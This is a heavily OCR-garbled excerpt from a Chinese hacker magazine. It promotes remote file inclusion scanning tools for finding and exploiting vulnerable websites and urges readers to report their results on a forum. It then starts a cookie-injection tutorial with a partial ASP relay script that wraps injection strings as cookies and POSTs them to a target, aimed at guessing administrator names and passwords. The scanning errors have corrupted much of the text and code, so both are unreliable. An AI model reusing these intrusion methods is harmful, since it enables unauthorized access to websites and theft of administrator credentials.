如发现有乱码，请点击下面链接浏览原文
正文摘录:

图6一个全自动的扫描工具，我们只要填写搜索语法就行了(关于搜索的语法，已收录在光盘中)。当然，如果我们发现了RFI漏洞的话，构造搜索语法就能找到更多哟!程序的主界面如图6所示。最后，我收集的一蝼RFI工其也已经收录在了光甜中，叉子们别忘了去x坛子报告战果!(文章中涉及到的工具x—Codev、RFI扫描者，G00清扫自、G00小跑堂、RFI挖掘工具已收录到光盘中)小组点评：关于远程文件包含漏洞，从早期的手工利用方法，到最近几期的如何使用工具来寻找存在漏洞的网站及利用，相位各位读者都已经能够掌握这种漏洞的利用7。对于已经玩腻7脚本注入的叉子们，不妨好好的研究一下远程文件包含漏洞，既可以赶个时髦叉可以多掌握一种流行的八侵方法。小编也希望各位叉子在学习过程中，如果有什幺好的方法或是技巧的话。能够写出来与大家分享一下。最后，自然还要感谢作者帮叉子们汉化T这些不错的小工具。墨在今年第2期黑客X档案的“注入’星蒴网站管理系统2.0”一文中，樱花浪子给我们提供了一种突破防注入系统的方法Cookie注入。这个方法非常好，其中所提到的测试方法很值得我们学习，但如果使用这种方法去猜测管理员的名称和密码，嘿嘿，倘若没有坚强的毅力多半会半途而废的。那么，有什么好的方法可以快速的猜出吗?前两天我在分析xMLHTTP时，找到了一种方法，下面就为浪子兄弟找到的Cookie注入再一把柴。首先在本地的IlS根目录或自己在网上的ASP空间内创建一个ASP文件，为JMDCW.ASP，其内容如下：<％dmdcwName=request(”jmdcw”)’接收注人工且提交来的注^语句JmdcwNeme=escepe(JmdcwNsme)’进行Cookie转码JmStr='一id=u&JmdcwName’存在注人的键名dmStr=replace(JmStr.chr(32)。”％20”)’过滤Cookies中的空格为。％20”JmStr—r。D『8ce(Jmstr，chr(43).。％28’‘)’过滤Cookies中的。+’为。％2B’／／以下是需璺更改的项目JMUrl；‘’http：／／127~001／)clng’shownew8Else。’’存在注^的用址JmRef=,http.／／12700l／index.asp”’来意地址JmCok=”／／以JmCok=JmCok&”l”＆Jmstr＆”Cookies值进行过滤”’对采用Cookie注^攫交参数进行转码’。／以下代码是执行HTTP提变.并显示结果responsewritePostOete(JMUrl，JmCok，dmRef)一／／以下为自定义宙数，来蠢于网路.在此囊示照谢FunctionPostD8ta(PostUrl.PostCok，PostRef)。HTTP提交嚣数.在薄代码曲基础上进行0ImHttpSetHttp=Server.CreeteOb|ect(”msxml2.serverXMLHTTP”)’对需要提交Cookie僵韵采用rerXMLHTTP.其它类型的可以采用XMLHTTPWithHttpOpen”POST”.PostUrl，False。打开目标URL.SetReauestHeader“Content—Type”.”apeiicetion／x—WWW—form-urlencoded”